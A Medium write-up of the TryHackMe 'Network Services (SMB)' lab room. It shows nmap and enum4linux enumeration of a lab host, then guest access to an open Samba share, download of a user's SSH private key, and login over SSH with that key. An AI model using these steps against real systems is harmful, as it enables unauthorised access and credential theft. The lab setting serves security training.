Network Services (SMB)— Tryhackme

Enumerating SMB

$ sudo nmap -Pn -A -sV 10.10.243.160Nmap scan report for 10.10.243.160
Host is up (0.43s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 91:df:5c:7c:26:22:6e:90:23:a7:7d:fa:5c:e1:c2:52 (RSA)
| 256 86:57:f5:2a:f7:86:9c:cf:02:c1:ac:bc:34:90:6b:01 (ECDSA)
|_ 256 81:e3:cc:e7:c9:3c:75:d7:fb:e0:86:a0:01:41:77:81 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Network Distance: 4 hops
Service Info: Host: POLOSMB; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-02-22T03:00:48
|_ start_date: N/A
|_nbstat: NetBIOS name: POLOSMB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: polosmb
| NetBIOS computer name: POLOSMB\x00
| Domain name: \x00
| FQDN: polosmb
|_ System time: 2022-02-22T03:00:48+00:00
  1. Conduct an nmap scan of your choosing, How many ports are open?
3
139/445
WORKGROUP
POLOSMB
6.1
#enum4linux -S 10.10.243.160
Sharename Type Comment
--------- ---- -------
netlogon Disk Network Logon Service
profiles Disk Users profiles
print$ Disk Printer Drivers
IPC$ IPC IPC Service (polosmb server (Samba, Ubuntu))
profiles

Exploiting SMB

SMBClient

smbclient //[IP]/[SHARE]
  1. What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port?
smbclient //10.10.10.2/secret -U suit -p 445
smbclient //10.10.243.160/profiles -p 445
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \>
Y
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \> ls
. D 0 Tue Apr 21 07:08:23 2020
.. D 0 Tue Apr 21 06:49:56 2020
.cache DH 0 Tue Apr 21 07:08:23 2020
.profile H 807 Tue Apr 21 07:08:23 2020
.sudo_as_admin_successful H 0 Tue Apr 21 07:08:23 2020
.bash_logout H 220 Tue Apr 21 07:08:23 2020
.viminfo H 947 Tue Apr 21 07:08:23 2020
Working From Home Information.txt N 358 Tue Apr 21 07:08:23 2020
.ssh DH 0 Tue Apr 21 07:08:23 2020
.bashrc H 3771 Tue Apr 21 07:08:23 2020
.gnupg DH 0 Tue Apr 21 07:08:23 2020
12316808 blocks of size 1024. 7584024 blocks available
smb: \> more "Working From Home Information.txt"
John Cactus
SSH
.ssh
smb: \> cd .ssh
smb: \.ssh\> ls
. D 0 Tue Apr 21 07:08:23 2020
.. D 0 Tue Apr 21 07:08:23 2020
id_rsa A 1679 Tue Apr 21 07:08:23 2020
id_rsa.pub N 396 Tue Apr 21 07:08:23 2020
authorized_keys N 0 Tue Apr 21 07:08:23 2020
12316808 blocks of size 1024. 7584024 blocks available
smb: \> mget .ssh/id_rsa*
Get file id_rsa? yes
getting file \.ssh\id_rsa of size 1679 as .ssh/id_rsa (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)
Get file id_rsa.pub? yes
getting file \.ssh\id_rsa.pub of size 396 as .ssh/id_rsa.pub (0.2 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \>
chmod 600 id_rsa
ssh -i id_rsa cactus@10.10.243.160
cat smb.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store